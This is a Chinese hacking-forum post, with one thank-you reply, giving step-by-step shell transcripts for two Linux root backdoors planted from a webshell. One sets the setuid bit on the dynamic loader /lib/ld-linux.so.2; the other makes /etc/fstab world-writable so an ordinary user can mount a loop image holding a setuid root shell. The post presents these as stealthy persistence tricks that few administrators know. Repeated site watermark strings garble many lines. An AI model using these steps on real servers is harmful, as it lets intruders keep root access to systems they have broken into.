找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3166|回复: 1
打印 上一主题 下一主题

webshell下LINUX提权+留后门

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:56:25 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
方法一:setuid的方法,其实8是很隐蔽。看看过程:2ezX-BUG-关注前沿信息安全技术研究& H$ o$ `+ h  r9 [' [
; a& S1 |) _" a4 n, M  x' L" O
[root@localdomain lib]# ls -l |grep ld-linux2ezX-BUG-关注前沿信息安全技术研究5 Q8 _% S7 {6 L+ X
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究6 S0 f: I; H: k- q# @8 _
lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究: S7 c' G; N( G" V
[root@localdomain lib]# chmod +s ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究
, W: S( Y, p8 E4 C) u[root@localdomain lib]# ls -l |grep ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究) @0 r  h* a) q' g$ W
-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
0 s9 r. H; R$ m0 w) ]lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
1 k, b: C3 ^; \[root@localdomain lib]#2ezX-BUG-关注前沿信息安全技术研究
- R1 y; q* F& [% `/ H我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。2ezX-BUG-关注前沿信息安全技术研究  O9 V0 g2 e/ E

! n. B$ y0 i) v; b- h普通用户登录,测试下权限:2ezX-BUG-关注前沿信息安全技术研究
" a' O7 z4 }7 t* A2 f9 y% M  z5 a6 o9 p5 k6 U2 x9 R
[xiaoyu@localdomain ~]$ whoami2ezX-BUG-关注前沿信息安全技术研究
4 R  T8 O3 o3 ?# N- l1 ixiaoyu2ezX-BUG-关注前沿信息安全技术研究5 G+ b, u1 }, w: f
[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`2ezX-BUG-关注前沿信息安全技术研究/ d1 A6 ~/ [. m( M& \
root2ezX-BUG-关注前沿信息安全技术研究. R, z4 z" J0 _0 }- v6 a# n: J! `
[xiaoyu@localdomain ~]$2ezX-BUG-关注前沿信息安全技术研究
% m% y4 ~% ~' O) S恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。2ezX-BUG-关注前沿信息安全技术研究# a6 {7 D5 _8 Q  E7 M) B
) m9 `: q$ D3 u% d$ ~, W
方法二:2ezX-BUG-关注前沿信息安全技术研究
2 ?+ y5 ]: ?; x' i1 M4 ^6 M5 m4 N& X* T- y, s0 `
看过程:2ezX-BUG-关注前沿信息安全技术研究
9 t1 K- K' H* _& Z" `' Q9 Q1 `5 j$ m. A4 b+ m2 |& X- W
[root@localdomain etc]# chmod a+w /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
6 s% W# ~+ W/ |% j[root@localdomain etc]#2ezX-BUG-关注前沿信息安全技术研究" d$ y0 F' N2 M5 E

3 @7 Z$ @) v2 n/ O) a8 r, B3 ~: a这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下2ezX-BUG-关注前沿信息安全技术研究
  R7 l! W8 R5 ?2 E2 u3 w- S3 [8 }
[xiaoyu@localdomain ~]$ ls -l /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
* @! u( |& J; n5 S7 M-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab2ezX-BUG-关注前沿信息安全技术研究4 D0 x' E$ }9 \: S3 c5 T" o
[xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab2ezX-BUG-关注前沿信息安全技术研究7 m+ S: z" t" s* p7 r1 s0 F% v
! x6 s) h6 ~( ?6 E( C9 J- v- c- h
然后从本机把一个文件到目标机器上去,这里我们命名为test2ezX-BUG-关注前沿信息安全技术研究
- d, O9 D5 ?* O+ T
0 L3 }: _1 m/ u7 n. r1 ~[xiaoyu@localdomain tmp]$ ls -l test2ezX-BUG-关注前沿信息安全技术研究3 ]3 l- n: L( v. `! |0 T
-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test2ezX-BUG-关注前沿信息安全技术研究, y8 J( [' w" L0 ?
[xiaoyu@localdomain tmp]$ mount test2ezX-BUG-关注前沿信息安全技术研究
$ _. t, J1 X2 N  T[xiaoyu@localdomain tmp]$ cd /mnt2ezX-BUG-关注前沿信息安全技术研究; e0 x$ Q' l2 g1 f! L
[xiaoyu@localdomain mnt]$ ls -l2ezX-BUG-关注前沿信息安全技术研究9 I2 ^8 x$ A& W! m2 l
total 182ezX-BUG-关注前沿信息安全技术研究
! }0 i  a! n, ?6 P5 Udrwx------ 2 root root 12288 2008-04-20 05:44 lost+found2ezX-BUG-关注前沿信息安全技术研究8 E7 b- w- ?, Y1 }! V5 k4 c
-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root2ezX-BUG-关注前沿信息安全技术研究: H+ H' h) n4 H& c+ {' Z$ x  G6 u# |
[xiaoyu@localdomain mnt]$ ./root2ezX-BUG-关注前沿信息安全技术研究
2 u; R7 e' n" l/ [* m, tsh-3.2#2ezX-BUG-关注前沿信息安全技术研究; R0 R6 d0 C8 i5 G% {8 G
看到了吧,从普通用户提升到root了。呵呵。2ezX-BUG-关注前沿信息安全技术研究
) F$ T7 P$ F0 ktest这个文件baidu貌似木有上传功能撒,木办法传2ezX-BUG-关注前沿信息安全技术研究4 g* `" I& `& C8 r* {+ b9 y
3 m, X4 R7 H# \' W* P* ?
貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....2ezX-BUG-关注前沿信息安全技术研究' i8 K# a( Q+ z# q( T
2ezX-BUG-关注前沿信息安全技术研究
* G  E7 w0 C9 x  K* k: |" s6 ?. [4 q" d5 D
回复

使用道具 举报

沙发
发表于 2013-3-13 15:10:29 | 只看该作者
谢谢分享
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表